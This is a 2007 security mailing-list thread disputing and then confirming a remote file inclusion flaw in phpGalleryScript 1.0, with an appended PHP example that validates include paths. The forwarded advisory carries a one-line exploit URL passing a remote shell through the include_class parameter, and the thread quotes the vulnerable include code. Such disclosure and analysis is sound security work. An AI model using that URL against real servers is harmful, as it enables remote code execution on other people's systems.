[VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities

rkeith at securityfocus.com
Tue Apr 10 19:58:13 UTC 2007


dirname("http://milw0rm.com/test") => http://milw0rm.com

Looks valid to me.

--
Rob Keith
Symantec

On Tue, 10 Apr 2007, str0ke wrote:

> init.gallery.php
> #######################3
>
> $inc_path = dirname($include_class);
> require ($inc_path."/class.gallery.php");
> include($inc_path."/config.gallery.php");
> ....
> #######################3
>
> dirname("http://milw0rm.com") == http:
>
> /str0ke
>
> ---------- Forwarded message ----------
> From: z12xxa at gmail.com <z12xxa at gmail.com>
> Date: 9 Apr 2007 23:19:32 -0000
> Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> To: bugtraq at securityfocus.com
>
>
> vendor url: http://tomex.org/
>
> http://[victim]/php/init.gallery.php?include_class=[SHELL]
>
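
Added example, not part of the thread and not phpGalleryScript code: it prints what `dirname()` returns for the two URL strings discussed above, then shows one way to constrain a request-supplied path before it is used in `require`/`include`. `GALLERY_BASE` and `resolve_inc_path()` are hypothetical names, and the relative paths in the sample list are constructed.

```php
<?php
// Added example. GALLERY_BASE and resolve_inc_path() are hypothetical names,
// not identifiers from phpGalleryScript.
define('GALLERY_BASE', __DIR__);

/**
 * Return a directory under $base that is safe to prefix onto include paths,
 * or null when the candidate must be rejected.
 */
function resolve_inc_path($candidate, $base = GALLERY_BASE)
{
    if (!is_string($candidate) || $candidate === '') {
        return null;
    }
    // Reject anything that starts with a stream-wrapper scheme (http://,
    // ftp://, php://, data:, ...). dirname() treats a URL as an ordinary
    // string, so a URL with a path component keeps its scheme and host.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return null;
    }
    // Resolve relative to the base directory and canonicalise, so "../"
    // sequences and symlinks are collapsed before the containment check.
    $baseReal = realpath($base);
    $dirReal  = realpath($base . DIRECTORY_SEPARATOR . dirname($candidate));
    if ($baseReal === false || $dirReal === false) {
        return null;
    }
    // Accept the base directory itself or a directory strictly inside it.
    $inside = ($dirReal === $baseReal)
        || strpos($dirReal, $baseReal . DIRECTORY_SEPARATOR) === 0;
    return $inside ? $dirReal : null;
}

// The two URL strings come from the thread; the relative paths are constructed.
$samples = array(
    'http://milw0rm.com',
    'http://milw0rm.com/test',
    'init.gallery.php',
    '../outside/class.gallery.php',
);

foreach ($samples as $s) {
    $safe = resolve_inc_path($s);
    printf("%-32s dirname=%-22s accepted=%s\n",
        $s, dirname($s), $safe === null ? 'no' : $safe);
}
```

Whether PHP will fetch a remote URL in `include`/`require` at all also depends on the `allow_url_fopen` and `allow_url_include` ini settings; the check above does not rely on them.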

